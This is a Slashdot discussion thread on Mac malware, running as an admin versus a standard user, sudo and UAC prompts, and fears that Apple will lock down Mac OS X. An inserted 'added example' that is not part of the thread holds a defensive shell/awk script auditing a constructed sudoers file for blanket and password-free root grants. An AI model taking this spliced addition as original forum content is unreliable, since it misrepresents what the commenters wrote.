My mom refuses to ditch Windows despite nearly everyone else in my family (including grandparents) using Linux...
She's the only one that still gets malware -- the answer was simple: Windows Steady State [wikipedia.org] -- Restores the state of the machine each boot!
Only cure is to remove access (Score:2)
If Apple does get their future, where everything is part of the Apple walled garden and all apps, media, etc have to come from Apple then it would be possible to stop user infections. If the screening process was thorough enough, you could make sure nothing malicious ever made it through. Of course that is a big if, people could get creative to get around it. There's also the fact that many of us are not thrilled with the idea of one company being the gatekeeper of everything.
Short of that, nothing you can d
I hope Apple has learned a lesson from all of this (Score:3)
Hopefully in Lion they will, at the very least, explain to users that they should set up a non-admin account to do their everyday computing and only use the admin account when they need to do admin things.....
Re: (Score:3)
Almost completely irrelevant.
When the 'admin' user attempts to do anything requiring root privileges, the system prompts for a password. If you are running as a non-admin user, you just have to fill in a different username in the password box that pops up (that of an admin account). If you don't know the admin account password, then you are obviously not managing your computer, and if you do... Then you have to type in an entire extra word to get root privileges! Wow!
Re: (Score:2)
After playing around with Vista and its UAE when it first launched, I was impressed by its UI to make it seem very daunting and scary. I hoped it would train users to hit escape and find something better to do than shoot themselves in the foot.
Guess I was wrong...
Better Yet (Score:2)
That would solve a lot of problems.
Re:I hope Apple has learned a lesson from all of t (Score:5, Insightful)
Not exactly.
That user doesn't have admin privileges; that user is in effect, in the sudoers file. They can authorize admin privileged actions. The default user can't modify or tweak anything in /System. But they can be prompted to allow elevated access to allow things to write into important parts of the system.
And frankly, that SHOULD be the default. It doesn't make any sense at all to be more restrictive than that. Yes, you should not run as root, or administrator on Windows, in your day to day stuff. But in your regular, day to day stuff, on your machine-- you will in the normal course of events need to authorize programs to install globally or tweak system prefs or whatever else on occasion.
No one will EVER learn the "lesson" you want them to be taught. In a secure environment, you may have your regular user, who can't even possibly access (even via sudo) admin power, and an entirely separate account you use to do the system configuration and application install tasks that need higher authority. That will NEVER happen on user-focused machines. It's a frankly absurd notion.
Yes, that means machines will always be susceptible to stupid people running crap that they don't mean to download or are tricked into downloading, and that means there is no /solution/ to the problem of malware. In truth, even with such a system, you wouldn't solve the stupid. You can't solve the stupid.
The default user that people operate on, and which programs they naturally, passively run under -- should not have admin access. Of course not. Even Microsoft gets that, though their implementation of the escalation process is less than ideal. But if you expect someone to sit down on their desktop machine and ever have more than a single account, you're -- out of touch. That account should not have direct system-level access, no: but no one but a tiny minority of power users will ever accept having to set up some entirely separate account that can escalate privileges.
It's not that people are stupid, or careless. It's that your expectations are absurd. Security and ease-of-use are opposing concerns. Everyone with any sense knows this: in some situations the demands of security are such that we force the pain on usage, in others we try to find a balance which isn't as difficult.
There will never be a world where people will have two separate accounts on their home machine and that they need to decide to go from one account to another to make changes or operate said machine. People will simply use the tool given them, as they understand it is to be used.
Even on Linux, more is rarely expected outside of highly secure environs. Sudo is the norm. Yeah, your account can't do much, but you can explicitly invoke its elevation with your own same password -- and that's fine. Home machines will never, ever, be bastions of secure practice.
It's just not worth the pain in the ass to regular people doing regular things. Is it as good as it can be, as secure as it can be? Not yet, but they are working on it. Windows has its UAV method of privilege escalation that is overly in your face so it's too easy to hit 'yes' without thinking; Linux has its explicit 'sudo' which is fine (and with GUI helpers in certain environments), and Mac has its own escalation prompt. Is this paradigm of the default user being a sudoer ideal? Maybe not. But it's usable, and better than the situations where everything runs as root/administrator.
Usability frankly trumps security. You can not honestly expect users to give up much on their home systems, usability wise; or you're just out of touch with reality.
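An added example, neither the commenter's code nor Apple's configuration: a shell/awk report of who a sudoers file lets escalate and how far, which is the concrete difference between "the default user is in effect in the sudoers file" and the separate-account setup the thread argues about. The sample sudoers is constructed; its `%admin ALL=(ALL) ALL` rule has the shape of the Mac default behind that remark, the `%wheel` rule shows the weaker no-password variant, and the `backup` and `deploy` rules show the narrower per-command alternative. The parser handles only the common `user host=(runas) [TAG:] command` form; aliases and include directives are not parsed (an assumption about the input, not a feature of sudo).

```shell
#!/bin/sh
# Added example, not from the thread: report who a sudoers file lets escalate
# to root and how broadly.  The sample file is constructed; "%admin ALL=(ALL) ALL"
# mirrors the shape of the Mac default that makes the admin user "in effect,
# in the sudoers file", and the last two rules show per-command grants instead.

# write_sample_sudoers FILE: constructed sudoers mixing blanket grants with
# restricted ones.
write_sample_sudoers() {
    cat > "$1" <<'EOF'
# constructed sample, not a real /etc/sudoers
Defaults env_reset
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
%wheel  ALL=(ALL) NOPASSWD: ALL
backup  ALL=(root) /usr/local/bin/backup.sh
deploy  ALL=(root) NOPASSWD: /bin/systemctl restart app
EOF
}

# sudoers_grants FILE: one tab-separated line per rule:
#   PRINCIPAL  SCOPE (all-commands|restricted)  AUTH (nopasswd|password)
# Assumption: rules use the plain "who host=(runas) [TAG:] commands" form;
# User_Alias/Cmnd_Alias and #include lines are not handled.
sudoers_grants() {
    awk '
        /^[ \t]*(#|Defaults|$)/ { next }          # comments, Defaults, blanks
        {
            principal = $1
            spec = $0
            sub(/^[^=]*=/, "", spec)                 # keep text after the "="
            sub(/^[ \t]*\([^)]*\)[ \t]*/, "", spec)  # drop the "(runas)" part
            auth = (spec ~ /NOPASSWD:/) ? "nopasswd" : "password"
            sub(/^[A-Z]+:[ \t]*/, "", spec)          # drop NOPASSWD:/PASSWD: tag
            scope = (spec ~ /^ALL[ \t]*$/) ? "all-commands" : "restricted"
            printf "%s\t%s\t%s\n", principal, scope, auth
        }' "$1"
}

# count_blanket_grants FILE: principals allowed to run every command as root.
count_blanket_grants() {
    sudoers_grants "$1" | awk -F'\t' '$2 == "all-commands"' | wc -l | tr -d ' '
}

# count_nopasswd_grants FILE: rules that escalate without any password at all.
count_nopasswd_grants() {
    sudoers_grants "$1" | awk -F'\t' '$3 == "nopasswd"' | wc -l | tr -d ' '
}

# Stand-alone demo against the constructed sample.
sample=$(mktemp)
write_sample_sudoers "$sample"
printf 'principal\tscope\tauth\n'
sudoers_grants "$sample"
printf '%s blanket grant(s), %s without a password\n' \
    "$(count_blanket_grants "$sample")" "$(count_nopasswd_grants "$sample")"
rm -f "$sample"
```

Run against the sample it lists three blanket grants (root, %admin, %wheel) and two password-free rules; the %wheel line is the one a reviewer would push back on, since it combines every command with no prompt, which is exactly the "everything runs as root" situation the comment calls worse than a sudoer default user. The `backup`/`deploy` rows are what least privilege looks like when a machine really does need a second, narrower path to root.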
Re:From no malware on Mac (Score:5, Interesting)
Re: (Score:2)
No I'm not. That is not what I said at all. Did you reply to the right comment?!
Re: (Score:3)
Re: (Score:2)
Wait till it has the popularity / market share of Windows... Then we'll talk.
It's a well known fact that crackers only crack what crackers own. As a white-hat hacker/cracker I had never discovered any exploit vectors on Mac OS or iOS -- I also never owned an under-powered/over-priced piece of Apple hardware... (Yes, I just bought a machine that has higher specs than any notebook Apple sells, for less than half the price of their inferior model... Quality? Major components are the same brand Apple uses.
Re: (Score:2)
None of these are viruses.
Any douche can write a destructive trojan that will get by a scanner for a while. Seriously. Doesn't matter what platform you're using.
Not a real virus. By ANY..... STRETCH......OF......THE......IMAGINATION.
I saw some real viruses under Classic MacOS in the System 6 and System 7 days. So far none for OSX.
No amount of tech can stop people from clicking on something destructive. Trojans do NOT count as viruses. No OS update or security software is going to make users smarter. So
Re:And so it begins... (Score:5, Insightful)
The slow, but inevitable slide to Mac OS X being locked down in the exact same way that iOS is.
First they block apps in the name of protecting users from themselves... Then they just slowly increase the definition of "harmful apps."
If by "first they block apps..." you mean "first they warn you that an app might be harmful, suggesting that you drag it to the trash, and providing a one-click option to do that from the warning dialog...", yeah.
Re: (Score:2)
The slow, but inevitable slide to Mac OS X being locked down in the exact same way that iOS is.
Wake me when they actually make it so you cannot execute scripts in OSX. Bonus points if you can explain how you're gonna make Flash movies or do any sort of programming on a Mac with iOS-like restrictions.
Re: (Score:2)
explain how you're gonna make Flash movies or do any sort of programming on a Mac with iOS-like restrictions.
That is something that only professionals who are willing to pay a premium for their computers need. All those home users can just get by with applications from the App Store.
The Apple concept of computing is that home users should treat their computers like appliances: plug it in, and never worry about technical details. Sure, professional and "power" users demand more, but they represent a very small fraction of Apple's target market at this point, and Apple can get away with charging them more (t
Re: (Score:3)
And yet, Apple Desktops and Laptops come with a fairly complete BSD Unix toolset, including several scripting languages (perl, python, ruby, shell, probably some others I don't know about, applescript, automator, a gcc compiler...
How much of that stuff can you get on Windows' default install?
Now, it's apparently true that Xcode is no longer a free download (although I suspect it's still on Snow Leopard install disks...), but let's wait to see what the next version has to offer before we assume they're just
Re: (Score:2)
Xcode is most certainly still a free download. Sure you have to register for the Mac Developer program but that's really not that big of a deal. You probably have an Apple ID already so signing up is just a matter of logging into your Apple account.
http://developer.apple.com/xcode/
"Download Xcode 4 for Free. Xcode 4 is a free download for all members of the iOS and Mac Developer Programs. Log in to your account to begin the download."
Now developing anything for iOS is a whole different ball of wax.
Re: (Score:2)
The Mac Developer program is now $99/year.
Re: (Score:2)
Oops, that's right. It's XCode3 you can still download without paying anything. As others have pointed out they're still shipping XCode 3 on the install disks.
Buried at the bottom of that page is this "Looking for Xcode 3? Download Now" which directs you to log into an Apple Developer Connection account, which is free to get.
Re: (Score:2)
As for Mac OS X shipping with a BSD toolset, this was mainly to allow App
Re: (Score:2)
*cough* tcl/tk *cough*
Though I'm surprised, I'm glad OSX still ships with it. I like tcl personally.
Re: (Score:2)
How much of that stuff can you get on Windows' default install?
JScript/VBScript interpreters, C#/VB.NET/JScript.NET compilers, PowerShell, MSBuild.
Re: (Score:2, Interesting)
Bonus points if you can explain how you're gonna make Flash movies or do any sort of programming on a Mac with iOS-like restrictions.
Same way you do programming on the iPhone: pay $100/year for a developer license.
And if you think they aren't going down that road already, remember how developer tools used to come with the Mac OS X DVD?
You can no longer download Xcode for free. It now costs $5 and is only available with an Apple account off the Mac OS X App Store. (Or free from the App Store if you already have a developer license, but you still need to get it through the App Store.)
Apple is already down the path to locking down Mac OS X.
Re: (Score:2)
I don't agree that Apple is on the way to locking down the Mac like iOS.
But your assertion that it's impossible somehow is just silly. How are apps developed for iOS? Special developer licenses. If Apple wanted to do it, they could. The only thing keeping them from doing it is momentum of public will. Users would revolt if they changed the system now. There was no entrenched freedom when Apple entered the mobile world. Well, except for users of mobile platforms that predate iOS like Windows Mobile, b
Re: (Score:2)
How are apps developed for iOS?
They are written on machines that aren't locked down like iOS. You cannot, for example, create an iPhone app from the iPhone or any other iOS device. Nothing is created on iOS devices because Apple explicitly forbids running 'executable' types of data.
If Apple wanted to do it, they could. The only thing keeping them from doing it is momentum of public will.
That and the fact that OSX wasn't designed to run in such a restricted mode. The customers would not be able to run anything they have now!
Nobody has really thought through the ramifications of trying to actually maintain something like a desktop OS with i
Re: (Score:2)
Apple entered the mobile world in the early 90's with the Newton. By 1997 it actually didn't suck. With addons it could make phone calls, etc. Kind of a pity it was axed, the OS was neat. Handwriting recognition sucked horridly from the onset and the device's rep never recovered, even after they got it working fairly well on the StrongARM-based MP2000 and MP2100 after a couple updates. The SA110@162-220Mhz was no slouch for those days in a handheld. 2 PCMCIA slots ruled too. What they missed is most